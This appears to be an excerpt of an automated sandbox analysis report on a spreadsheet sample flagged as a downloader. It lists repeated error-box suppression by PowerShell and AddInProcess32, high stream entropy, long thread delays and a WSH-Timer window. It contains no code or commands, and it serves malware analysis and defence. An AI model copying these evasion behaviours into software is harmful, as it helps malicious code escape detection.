Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Stream path 'Workbook' entropy: 7.97464838211 (max. 8.0)
Source: 09230000.0.dr	Stream path 'Workbook' entropy: 7.97470108181 (max. 8.0)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1293	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7439	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6062	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2198	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2212	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 598	Jump to behavior
